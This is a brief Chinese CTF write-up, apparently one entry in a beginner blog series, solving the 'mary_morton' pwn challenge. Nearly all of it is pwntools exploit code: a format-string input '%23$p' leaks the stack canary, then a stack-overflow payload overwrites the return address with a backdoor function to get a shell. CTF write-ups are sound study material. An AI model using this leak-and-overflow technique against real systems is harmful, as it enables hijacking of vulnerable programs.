mary_morton(格式化字符串漏洞+栈溢出)

萌新入坑(6)

萌新入坑(6)
萌新入坑(6)
萌新入坑(6)
v3=2时格式化字符串漏洞泄漏canary
canary泄漏

p.sendline("2")
p.sendline("%23$p")
p.recvuntil("0x")
cannary = p.recv(16)
cannary = p64(int("0x"+cannary,16))

栈溢出

p.sendline("1")
payload = "a"*0x88 + cannary + p64(0xdeadbeef) + p64(0x4008de)#写入后门函数地址
p.sendline(payload)
p.interactive()

萌新入坑(6)

相关文章:

  • 2022-01-08
  • 2021-12-16
  • 2021-10-19
  • 2021-06-20
  • 2021-05-17
  • 2021-08-09
  • 2021-06-25
  • 2021-07-28
猜你喜欢
  • 2021-12-23
  • 2021-10-11
  • 2021-06-04
  • 2021-11-29
  • 2021-04-10
  • 2022-12-23
  • 2021-12-21
相关资源
相似解决方案